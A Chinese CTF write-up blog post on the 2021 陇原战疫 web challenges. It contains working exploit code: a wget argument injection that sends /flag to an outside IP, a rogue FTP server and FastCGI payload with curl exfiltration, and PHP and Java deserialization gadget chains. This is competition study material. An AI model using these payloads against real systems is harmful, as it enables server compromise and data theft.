陇原战疫web部分wp

最新推荐文章于 2022-03-11 10:38:20 发布
最新推荐文章于 2022-03-11 10:38:20 发布
阅读量857 收藏
点赞数 1
分类专栏: ctfwp 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fmyyy1/article/details/121203284
版权

web

CheckIN

下载源码,看到这里

1636291705109.png

这里调用wget,并且参数可控,可以直接外带数据,查看绑定路由

1636291885087.png

尝试访问/wget?argv=1

1636291928433.png

这里应该是出题人失误,无需登录可直接访问,利用–post-file参数直接外带文件

payload

/wget?argv=fmyyy&argv=--post-file&argv=/flag&argv=http://124.70.40.5:1234

服务器开个监听直接打就行

1636292129772.png

eaaasyphp

反序列化,有个file_put_content可以写文件,本地能打通但是题目写不进去,估计没有写的权限,看phpinfo的hint

payload

?code=O%3A6%3A%22Bypass%22%3A2%3A%7Bs%3A1%3A%22a%22%3BO%3A4%3A%22Esle%22%3A0%3A%7B%7Ds%3A4%3A%22str4%22%3Bs%3A7%3A%22phpinfo%22%3B%7D

1636292468201.png

看到有fpm服务,file_put_contents可控,尝试ftp被动模式打fpm

网上找个ftp恶意服务器

# -*- coding: utf-8 -*-
# @Time    : 2021/1/13 6:56 下午
# @Author  : tntaxin
# @File    : ftp_redirect.py
# @Software:

import socket
from urllib.parse import unquote

# 对gopherus生成的payload进行一次urldecode
payload = unquote("%01%01%1EJ%00%08%00%00%00%01%00%00%00%00%00%00%01%04%1EJ%02%16%00%00%11%0BGATEWAY_INTERFACEFastCGI/1.0%0E%04REQUEST_METHODPOST%0F%17SCRIPT_FILENAME/var/www/html/index.php%0B%17SCRIPT_NAME/var/www/html/index.php%0C%00QUERY_STRING%0B%17REQUEST_URI/var/www/html/index.php%0D%01DOCUMENT_ROOT/%0F%0ESERVER_SOFTWAREphp/fcgiclient%0B%09REMOTE_ADDR127.0.0.1%0B%04REMOTE_PORT9985%0B%09SERVER_ADDR127.0.0.1%0B%02SERVER_PORT80%0B%09SERVER_NAMElocalhost%0F%08SERVER_PROTOCOLHTTP/1.1%0C%10CONTENT_TYPEapplication/text%0E%02CONTENT_LENGTH63%098PHP_VALUEauto_prepend_file%20%3D%20php%3A//input%3B%0D%0Aallow_url_include%20%3D%20On%0F8PHP_ADMIN_VALUEauto_prepend_file%20%3D%20php%3A//input%3B%0D%0Aallow_url_include%20%3D%20On%01%04%1EJ%00%00%00%00%01%05%1EJ%00%3F%00%00%3C%3Fphp%20system%28%27curl%20http%3A//124.70.40.5%3A1111/%20-F%20file%3D%40/flag%27%29%3B%3F%3E%01%05%1EJ%00%00%00%00")
payload = payload.encode('utf-8')

host = '0.0.0.0'
port = 23
sk = socket.socket()
sk.bind((host, port))
sk.listen(5)

# ftp被动模式的passvie port,监听到1234
sk2 = socket.socket()
sk2.bind((host, 1234))
sk2.listen()

# 计数器,用于区分是第几次ftp连接
count = 1
while 1:
    conn, address = sk.accept()
    conn.send(b"200 \n")
    print(conn.recv(20))  # USER aaa\r\n  客户端传来用户名
    if count == 1:
        conn.send(b"220 ready\n")
    else:
        conn.send(b"200 ready\n")

    print(conn.recv(20))   # TYPE I\r\n  客户端告诉服务端以什么格式传输数据,TYPE I表示二进制, TYPE A表示文本
    if count == 1:
        conn.send(b"215 \n")
    else:
        conn.send(b"200 \n")

    print(conn.recv(20))  # SIZE /123\r\n  客户端询问文件/123的大小
    if count == 1:
        conn.send(b"213 3 \n")  
    else:
        conn.send(b"300 \n")

    print(conn.recv(20))  # EPSV\r\n'
    conn.send(b"200 \n")

    print(conn.recv(20))   # PASV\r\n  客户端告诉服务端进入被动连接模式
    if count == 1:
        conn.send(b"227 124,70,40,5,4,210\n")  # 服务端告诉客户端需要到哪个ip:port去获取数据,ip,port都是用逗号隔开,其中端口的计算规则为:4*256+210=1234
    else:
        conn.send(b"227 127,0,0,1,35,40\n")  # 端口计算规则:35*256+40=9000

    print(conn.recv(20))  # 第一次连接会收到命令RETR /123\r\n,第二次连接会收到STOR /123\r\n
    if count == 1:
        conn.send(b"125 \n") # 告诉客户端可以开始数据链接了
        # 新建一个socket给服务端返回我们的payload
        print("建立连接!")
        conn2, address2 = sk2.accept()
        conn2.send(payload)
        conn2.close()
        print("断开连接!")
    else:
        conn.send(b"150 \n")
        print(conn.recv(20))
        exit()

    # 第一次连接是下载文件,需要告诉客户端下载已经结束
    if count == 1:
        conn.send(b"226 \n")
    conn.close()
    count += 1

生成payload的脚本

# -*- coding:utf-8 -*-
import base64
import socket
import random
import argparse
import sys
from io import BytesIO
from six.moves.urllib import parse as urlparse
from urllib.parse import quote_plus

# Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client

PY2 = True if sys.version_info.major == 2 else False


def bchr(i):
    if PY2:
        return force_bytes(chr(i))
    else:
        return bytes([i])


def bord(c):
    if isinstance(c, int):
        return c
    else:
        return ord(c)


def force_bytes(s):
    if isinstance(s, bytes):
        return s
    else:
        return s.encode('utf-8', 'strict')


def force_text(s):
    if issubclass(type(s), str):
        return s
    if isinstance(s, bytes):
        s = str(s, 'utf-8', 'strict')
    else:
        s = str(s)
    return s


class FastCGIClient:
    """A Fast-CGI Client for Python"""

    # private
    __FCGI_VERSION = 1

    __FCGI_ROLE_RESPONDER = 1
    __FCGI_ROLE_AUTHORIZER = 2
    __FCGI_ROLE_FILTER = 3

    __FCGI_TYPE_BEGIN = 1
    __FCGI_TYPE_ABORT = 2
    __FCGI_TYPE_END = 3
    __FCGI_TYPE_PARAMS = 4
    __FCGI_TYPE_STDIN = 5
    __FCGI_TYPE_STDOUT = 6
    __FCGI_TYPE_STDERR = 7
    __FCGI_TYPE_DATA = 8
    __FCGI_TYPE_GETVALUES = 9
    __FCGI_TYPE_GETVALUES_RESULT = 10
    __FCGI_TYPE_UNKOWNTYPE = 11

    __FCGI_HEADER_SIZE = 8

    # request state
    FCGI_STATE_SEND = 1
    FCGI_STATE_ERROR = 2
    FCGI_STATE_SUCCESS = 3

    def __init__(self, host, port, timeout, keepalive):
        self.host = host
        self.port = port
        self.timeout = timeout
        if keepalive:
            self.keepalive = 1
        else:
            self.keepalive = 0
        self.sock = None
        self.requests = dict()

    def __encodeFastCGIRecord(self, fcgi_type, content, requestid):
        length = len(content)
        buf = bchr(FastCGIClient.__FCGI_VERSION) \
            + bchr(fcgi_type) \
            + bchr((requestid >> 8) & 0xFF) \
            + bchr(requestid & 0xFF) \
            + bchr((length >> 8) & 0xFF) \
            + bchr(length & 0xFF) \
            + bchr(0) \
            + bchr(0) \
            + content
        return buf

    def __encodeNameValueParams(self, name, value):
        nLen = len(name)
        vLen = len(value)
        record = b''
        if nLen < 128:
            record += bchr(nLen)
        else:
            record += bchr((nLen >> 24) | 0x80) \
                + bchr((nLen >> 16) & 0xFF) \
                + bchr((nLen >> 8) & 0xFF) \
                + bchr(nLen & 0xFF)
        if vLen < 128:
            record += bchr(vLen)
        else:
            record += bchr((vLen >> 24) | 0x80) \
                + bchr((vLen >> 16) & 0xFF) \
                + bchr((vLen >> 8) & 0xFF) \
                + bchr(vLen & 0xFF)
        return record + name + value

    def __decodeFastCGIHeader(self, stream):
        header = dict()
        header['version'] = bord(stream[0])
        header['type'] = bord(stream[1])
        header['requestId'] = (bord(stream[2]) << 8) + bord(stream[3])
        header['contentLength'] = (bord(stream[4]) << 8) + bord(stream[5])
        header['paddingLength'] = bord(stream[6])
        header['reserved'] = bord(stream[7])
        return header

    def __decodeFastCGIRecord(self, buffer):
        header = buffer.read(int(self.__FCGI_HEADER_SIZE))

        if not header:
            return False
        else:
            record = self.__decodeFastCGIHeader(header)
            record['content'] = b''

            if 'contentLength' in record.keys():
                contentLength = int(record['contentLength'])
                record['content'] += buffer.read(contentLength)
            if 'paddingLength' in record.keys():
                skiped = buffer.read(int(record['paddingLength']))
            return record

    def request(self, nameValuePairs={}, post=''):
        # if not self.__connect():
        #     print('connect failure! please check your fasctcgi-server !!')
        #     return

        requestId = random.randint(1, (1 << 16) - 1)
        self.requests[requestId] = dict()
        request = b""
        beginFCGIRecordContent = bchr(0) \
            + bchr(FastCGIClient.__FCGI_ROLE_RESPONDER) \
            + bchr(self.keepalive) \
            + bchr(0) * 5
        request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_BEGIN,
                                              beginFCGIRecordContent, requestId)
        paramsRecord = b''
        if nameValuePairs:
            for (name, value) in nameValuePairs.items():
                name = force_bytes(name)
                value = force_bytes(value)
                paramsRecord += self.__encodeNameValueParams(name, value)

        if paramsRecord:
            request += self.__encodeFastCGIRecord(
                FastCGIClient.__FCGI_TYPE_PARAMS, paramsRecord, requestId)
        request += self.__encodeFastCGIRecord(
            FastCGIClient.__FCGI_TYPE_PARAMS, b'', requestId)

        if post:
            request += self.__encodeFastCGIRecord(
                FastCGIClient.__FCGI_TYPE_STDIN, force_bytes(post), requestId)
        request += self.__encodeFastCGIRecord(
            FastCGIClient.__FCGI_TYPE_STDIN, b'', requestId)

        return request

    def __waitForResponse(self, requestId):
        data = b''
        while True:
            buf = self.sock.recv(512)
            if not len(buf):
                break
            data += buf

        data = BytesIO(data)
        while True:
            response = self.__decodeFastCGIRecord(data)
            if not response:
                break
            if response['type'] == FastCGIClient.__FCGI_TYPE_STDOUT \
                    or response['type'] == FastCGIClient.__FCGI_TYPE_STDERR:
                if response['type'] == FastCGIClient.__FCGI_TYPE_STDERR:
                    self.requests['state'] = FastCGIClient.FCGI_STATE_ERROR
                if requestId == int(response['requestId']):
                    self.requests[requestId]['response'] += response['content']
            if response['type'] == FastCGIClient.FCGI_STATE_SUCCESS:
                self.requests[requestId]
        return self.requests[requestId]['response']

    def __repr__(self):
        return "fastcgi connect host:{} port:{}".format(self.host, self.port)


def generate_raw_payload(host, port, uri, query="", content="", PHP_VALUE="", PHP_ADMIN_VALUE=""):
    client = FastCGIClient(host, port, 3, 0)
    params = dict()
    documentRoot = "/"
    params = {
        'GATEWAY_INTERFACE': 'FastCGI/1.0',
        'REQUEST_METHOD': 'POST',
        'SCRIPT_FILENAME': documentRoot + uri.lstrip('/'),
        'SCRIPT_NAME': uri,
        'QUERY_STRING': '',
        'REQUEST_URI': uri,
        'DOCUMENT_ROOT': documentRoot,
        'SERVER_SOFTWARE': 'php/fcgiclient',
        'REMOTE_ADDR': '127.0.0.1',
        'REMOTE_PORT': '9985',
        'SERVER_ADDR': '127.0.0.1',
        'SERVER_PORT': '80',
        'SERVER_NAME': "localhost",
        'SERVER_PROTOCOL': 'HTTP/1.1',
        'CONTENT_TYPE': 'application/text',
        'CONTENT_LENGTH': "%d" % len(content),
        'PHP_VALUE': PHP_VALUE,
        'PHP_ADMIN_VALUE': PHP_ADMIN_VALUE
    }
    return client.request(params, content)


def generate_ssrf_payload(host, port, uri, query="", content="", PHP_VALUE="", PHP_ADMIN_VALUE=""):
    raw_payload = generate_raw_payload(host, port, uri, query, content , PHP_VALUE , PHP_ADMIN_VALUE )
    request_ssrf = urlparse.quote(raw_payload)
    return "gopher://127.0.0.1:" + str(port) + "/_" + request_ssrf


def generate_base64_socks_payload(host, port, extension_path, urlencode=False):
    raw_payload = generate_raw_payload(host, port, extension_path)
    data = force_text(base64.b64encode(raw_payload))
    if urlencode:
        data = urlparse.quote(data)
    return data



def base64_encode(s: str, encoding='utf-8') -> str:
    from base64 import b64encode
    return b64encode(s).decode(encoding=encoding)


if __name__ == '__main__':
    # v = 'short_open_tag=1;\r\nhtml_errors=0;\r\nlog_errors=1;\r\nerror_reporting=2\r\nerror_log=/var/www/html/sie.php\r\nextension_dir="<?=eval($_REQUEST[a]);?>";\r\nextension="?>"'
    v = 'auto_prepend_file = php://input;\r\nallow_url_include = On' 
    raw_payload = generate_ssrf_payload(
        "127.0.0.1", "9000", "/var/www/html/index.php", content="<?php system('curl http://124.70.40.5:1111/ -F file=@/flag');?>", PHP_ADMIN_VALUE=v, PHP_VALUE=v)
    print(raw_payload)
    # print(base64_encode(raw_payload))

生成的payload(弹shell没成功,尝试curl外带数据)

%01%01%9FL%00%08%00%00%00%01%00%00%00%00%00%00%01%04%9FL%02%16%00%00%11%0BGATEWAY_INTERFACEFastCGI/1.0%0E%04REQUEST_METHODPOST%0F%17SCRIPT_FILENAME/var/www/html/index.php%0B%17SCRIPT_NAME/var/www/html/index.php%0C%00QUERY_STRING%0B%17REQUEST_URI/var/www/html/index.php%0D%01DOCUMENT_ROOT/%0F%0ESERVER_SOFTWAREphp/fcgiclient%0B%09REMOTE_ADDR127.0.0.1%0B%04REMOTE_PORT9985%0B%09SERVER_ADDR127.0.0.1%0B%02SERVER_PORT80%0B%09SERVER_NAMElocalhost%0F%08SERVER_PROTOCOLHTTP/1.1%0C%10CONTENT_TYPEapplication/text%0E%02CONTENT_LENGTH63%098PHP_VALUEauto_prepend_file%20%3D%20php%3A//input%3B%0D%0Aallow_url_include%20%3D%20On%0F8PHP_ADMIN_VALUEauto_prepend_file%20%3D%20php%3A//input%3B%0D%0Aallow_url_include%20%3D%20On%01%04%9FL%00%00%00%00%01%05%9FL%00%3F%00%00%3C%3Fphp%20system%28%27curl%20http%3A//124.70.40.5%3A1111/%20-F%20file%3D%40/flag%27%29%3B%3F%3E%01%05%9FL%00%00%00%00

放到恶意ftp服务器即可

1636292913107.png

vps运行ftp服务器

poc生成:

<?php

class Check {
}

class Esle {
}


class Hint {
}


class Bunny {
    public $filename;
    public $data;
    public function __construct(){
        $this->filename = "ftp://aaa@124.70.40.5:23/123";
        $this->data = file_get_contents("ftp://aaa@124.70.40.5:23/123");
    }
}

class Welcome {
    public $username;
    public function __construct(){
        $this->username = new Bunny();
    }
}

class Bypass {
    public $str4;
    public function __construct(){
        $this->str4 = new Welcome();
    }
}

// $hint = new Hint();
$arr = array(new Esle(),new Bypass());
echo urlencode(serialize($arr));

poc

a%3A2%3A%7Bi%3A0%3BO%3A4%3A%22Esle%22%3A0%3A%7B%7Di%3A1%3BO%3A6%3A%22Bypass%22%3A1%3A%7Bs%3A4%3A%22str4%22%3BO%3A7%3A%22Welcome%22%3A1%3A%7Bs%3A8%3A%22username%22%3BO%3A5%3A%22Bunny%22%3A2%3A%7Bs%3A8%3A%22filename%22%3Bs%3A28%3A%22ftp%3A%2F%2Faaa%40124.70.40.5%3A23%2F123%22%3Bs%3A4%3A%22data%22%3Bs%3A645%3A%22%01%01%1EJ%00%08%00%00%00%01%00%00%00%00%00%00%01%04%1EJ%02%16%00%00%11%0BGATEWAY_INTERFACEFastCGI%2F1.0%0E%04REQUEST_METHODPOST%0F%17SCRIPT_FILENAME%2Fvar%2Fwww%2Fhtml%2Findex.php%0B%17SCRIPT_NAME%2Fvar%2Fwww%2Fhtml%2Findex.php%0C%00QUERY_STRING%0B%17REQUEST_URI%2Fvar%2Fwww%2Fhtml%2Findex.php%0D%01DOCUMENT_ROOT%2F%0F%0ESERVER_SOFTWAREphp%2Ffcgiclient%0B%09REMOTE_ADDR127.0.0.1%0B%04REMOTE_PORT9985%0B%09SERVER_ADDR127.0.0.1%0B%02SERVER_PORT80%0B%09SERVER_NAMElocalhost%0F%08SERVER_PROTOCOLHTTP%2F1.1%0C%10CONTENT_TYPEapplication%2Ftext%0E%02CONTENT_LENGTH63%098PHP_VALUEauto_prepend_file+%3D+php%3A%2F%2Finput%3B%0D%0Aallow_url_include+%3D+On%0F8PHP_ADMIN_VALUEauto_prepend_file+%3D+php%3A%2F%2Finput%3B%0D%0Aallow_url_include+%3D+On%01%04%1EJ%00%00%00%00%01%05%1EJ%00%3F%00%00%3C%3Fphp+system%28%27curl+http%3A%2F%2F124.70.40.5%3A1111%2F+-F+file%3D%40%2Fflag%27%29%3B%3F%3E%01%05%1EJ%00%00%00%00%22%3B%7D%7D%7D%7D

1636293475705.png

EasyJaba

反编译一下

BlacklistObjectInputStream
protected Class<?> resolveClass(ObjectStreamClass cls) throws IOException, ClassNotFoundException {
        if (this.blacklist.contains(cls.getName())) {
            throw new InvalidClassException("Unexpected serialized class", cls.getName());
        } else {
            return super.resolveClass(cls);
        }
    }
 Set blacklist = new HashSet() {
            {
                this.add("java.util.HashMap");
                this.add("javax.management.BadAttributeValueExpException");
            }
        };

不能用HashMap和BadAttributeValueExpException这两个,有remo的依赖

map换成Hashtable就行了

package lyzy.ctf.ezjaba.payload;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;

import com.sun.syndication.feed.impl.EqualsBean;
import com.sun.syndication.feed.impl.ObjectBean;

import javax.xml.transform.Templates;
import java.io.InputStream;
import java.lang.reflect.Field;
import java.util.Hashtable;


public class exp {
    public static void main(String[] args) throws Exception {

        // 生成包含恶意类字节码的 TemplatesImpl 类

        InputStream inputStream = evil.class.getResourceAsStream("evil.class");
        byte[] bytes = new byte[inputStream.available()];
        inputStream.read(bytes);

        TemplatesImpl tmpl = new TemplatesImpl();
        Field bytecodes = Reflections.getField(tmpl.getClass(),"_bytecodes");
        Reflections.setAccessible(bytecodes);
        Reflections.setFieldValue(tmpl,"_bytecodes",new byte[][]{bytes});

        Field name=Reflections.getField(tmpl.getClass(),"_name");
        Reflections.setAccessible(name);
        Reflections.setFieldValue(tmpl,"_name","123123");
        Reflections.setFieldValue(tmpl, "_tfactory", new TransformerFactoryImpl());

        // 使用 TemplatesImpl 初始化被包装类,使其 ToStringBean 也使用 TemplatesImpl 初始化
        ObjectBean delegate = new ObjectBean(Templates.class, tmpl);

        // 使用 ObjectBean 封装这个类,使其在调用 hashCode 时会调用 ObjectBean 的 toString
        // 先封装一个无害的类
        ObjectBean root = new ObjectBean(ObjectBean.class, new ObjectBean(String.class, "Sie"));

        // 放入 Map 中
        Hashtable map = new Hashtable();
        map.put(root,"Sie");


        // put 到 map 之后再反射写进去,避免触发漏洞
        Field field = ObjectBean.class.getDeclaredField("_equalsBean");
        field.setAccessible(true);
        field.set(root, new EqualsBean(ObjectBean.class, delegate));
        System.out.print(Serialize.serialize(map));


    }
}

evil.class用spring通用回显的就行了,用下面这个文章里的就行了

https://yao-mou.gitee.io/2021/11/01/2021-%E4%B8%9C%E5%8D%8E%E6%9D%AF-WEB-WriteUp/

1636293787544.png

fmyyy1
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
陇原战“疫“2021 web方向部分复现wp
Mrs_H的博客
11-13 1765
前言 今天白天打深育杯,人被打傻了。Web方向的题目是越来越离谱了,到最后比赛结束都只有3道Web题有人解出来。晚上没事闲的打开BUU一看,上次陇原战疫的题目没有下线,正好回去看看,当初因为vps出了一些情况被腾讯云的工作人员拿去修了,结果到了晚上才还给我,于是我就从这场比赛断开连接了。 正文 这里只复现两道题,剩下的java题目因为当前对java方向的安全漏洞利用还很生疏就先不去看了,等以后学完Java再回来看吧。 1.CheckIN 这道题属于是白给题目,不愧是签到题,很久没有见到这么友善的签到题了。
陇原战“疫“2021网络安全大赛部分WP
七堇年的博客
12-24 2036
陇原战"疫"2021网络安全大赛WP
陇原战役 Web题目WriteUP WP CTF竞赛
zxsctf的博客
03-11 5005
大家还记得上此次的陇原战役比赛么?今天给大家分享一下上次比赛的Web题目WriteUP!!
陇原战“疫“2021网络安全大赛 Web CheckIN
Sk1y的博客
12-24 3200
checkin 文章目录checkinwget外带数据分析官方wpnosql注入ssrf参考链接 参考链接:利用命令注入外带数据的一些姿势_一个安全研究员-CSDN博客_smb外带注入 题目有附件 下载,是个go语言,审计一下 ,文件目录如下 注意wget 还有 wget外带数据 根据上面的博客,可以执行命令wegt数据外带出来 wget?argv=1&argv=--post-file&argv=/flag&argv=http://vps:7777/ 然后既可以得到flag
陇原战”疫“ CTF web writeup
weixin_44502336的博客
11-08 3557
eaaasyphp 这道题折磨死我了。首先是看到一段很简单的pop链,很简单,很开心,啪的一下很快啊,就造出了链子。 <?php class Check { public static $str1 = false; public static $str2 = false; } class Esle { public function __wakeup() { Check::$str1 = true; } } class Bypass { pu
致敬战役者文字海报设计
07-22
在设计“致敬战役者文字海报”时,我们面临的主要任务是创造出一种视觉表现形式,能够有效地传达对前线战士们的敬意和感激之情。这不仅要求设计师具备扎实的平面设计技能,还需要对主题有深刻的理解和情感共鸣。在这...
简述中国4G战役
01-19
自从扛起了TD-SCDMA这面民族创新的大旗,TD-SCDMA是英文Time Division-Synchronous Code Division Multiple Access(时分同步码分多址) 的简称,是一种第三代无线通信的技术标准,也是ITU批准的三个3G标准中的一个...
C#编程 滑铁卢战役 简洁版
06-19
使用VC#.NET进行Windows下的图形界面 应用程序的开发 游戏规则 1. 整个战场为一个3×3的区域。 2. 玩家和计算机轮流在战场上放置炸弹,先把炸弹连成一线的一方获胜。所谓连成一线包括3个炸弹位于同一行、同一列...
NIIT Project1 滑铁卢战役实验报告
04-11
【滑铁卢战役实验报告】是江苏科技大学计算机学院软件工程专业的一个Project1实验,旨在让学生通过模拟滑铁卢战役的棋盘游戏学习编程和策略。在这个实验中,学生需要设计一个3×3的二维数组A来代表战场,数组的每个...
中途岛战役介绍ppt课件
05-19
中途岛战役,中途岛战役课件,中途岛战役PPT
11月陇原战疫2021网络安全大赛赛后部分web复现
qq_36410265的博客
12-27 2347
11月陇原战疫2021网络安全大赛赛后部分web复现
第五届“强网杯”全国网络安全挑战赛-线上赛Writeup
末初的CSDN博客
06-24 2878
文章目录WEB[强网先锋]赌徒MISC WEB [强网先锋]赌徒 目录扫描发现www.zip 下载得到源码index.php <meta charset="utf-8"> <?php //hint is in hint.php error_reporting(1); class Start { public $name='guest'; public $flag='syst3m("cat 127.0.0.1/etc/hint");'; public f
陇原战疫2021网络安全大赛 Web
feng的博客
11-08 5400
前言 题挺有意思的,Web有点难,而且后面三道难题放的有点晚了,时间不够(肝了一下午的Java)。这个比赛的难度,能早9晚9的话可能还好一些,早9晚5就有点紧了。 Java还是太菜了,需要学很多的东西。 eaaasyphp 反序列化链的构造很简单就不提了,正常构造写文件发现应该是不行的,目录应该不可写。给了个Hint类里面提示phpinfo,那打一下phpinfo看一下: class Bypass { public function __construct(){ $this->
[陇原战疫2021网络安全大赛]eaaasyphp
cosmoslin的博客
11-11 3131
eaaasyphp <?php class Check { public static $str1 = false; public static $str2 = false; } class Esle { public function __wakeup() { Check::$str1 = true; } } class Hint { public function __wakeup(){ $this-&gt
陇原杯 eaaasyphp
weixin_45751765的博客
11-24 3721
0x00 前言 比赛的时候一会写出个pop链,一发就500直接崩溃 后面才知道没有写权限也会这样(一开始以为自己????????链子写错了—) 看了师傅们的wp才知道还是自己太菜???? 知识点:FTP SSRF 打穿内网 0x01 复现 贴上源码和师傅的精简pop 学习一下别人的链子为什么写的比你好?! <?php class Check { public static $str1 = false; public static $str2 = false; } class Esle
2021 陇原战“疫”杯 eaaasyphp wp
Sapphire037的博客
11-08 377
eaaasyphp <?php class Check { public static $str1 = false; public static $str2 = false; } class Esle { public function __wakeup() { Check::$str1 = true; } } class Hint { public function __wakeup(){ $this-&gt
5. 函数
weixin_41547423的博客
11-11 270
1. 函数基础阶段 1. 函数的作用 需求:用户到ATM机取钱: 输入密码后显示"选择功能"界面 查询余额后显示"选择功能"界面 取2000钱后显示"选择功能"界面 特点:显示“选择功能”界面需要重复输出给用户,怎么实现? 函数就是将一段具有独立功能的代码块 整合到一个整体并命名,在需要的位置调用这个名称即可完成对应的需求。 函数在开发过程中,可以更高效的实现:代码重用。 2. 函数的使用步骤 2.1 定义函数 def 函数名(参数): 代码1 代码2 ......
IDF-CTF-天罗地网
saltor
04-19 8417
不难不易的js加密题目:就是这里 → http://ctf.idf.cn/game/web/28点击链接,弹出一个输入框。要求输入flag。查看源代码,发现一个script脚本。 然后复制到站长工具js混淆加密压缩那里解密。 http://tool.chinaz.com/js.aspx得到解密后的代码:var a = prompt("\u8f93\u5165\u4f60\u7684\x66\x6
chromedriver-mac-arm64_126.0.6474.0.zip
最新发布
07-31
chromedriver-mac-arm64_126.0.6474.0.zip
昆仑关战役发生的历史背景?
04-01
昆仑关战役发生的历史背景如下: 一、地缘政治背景:明朝时期,中国的北方和西北边疆地区一直处于不稳定的状态,因为这些地区常常受到外族入侵的威胁。其中,较为著名的入侵者包括蒙古、西藏、回部等。 二、政治...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值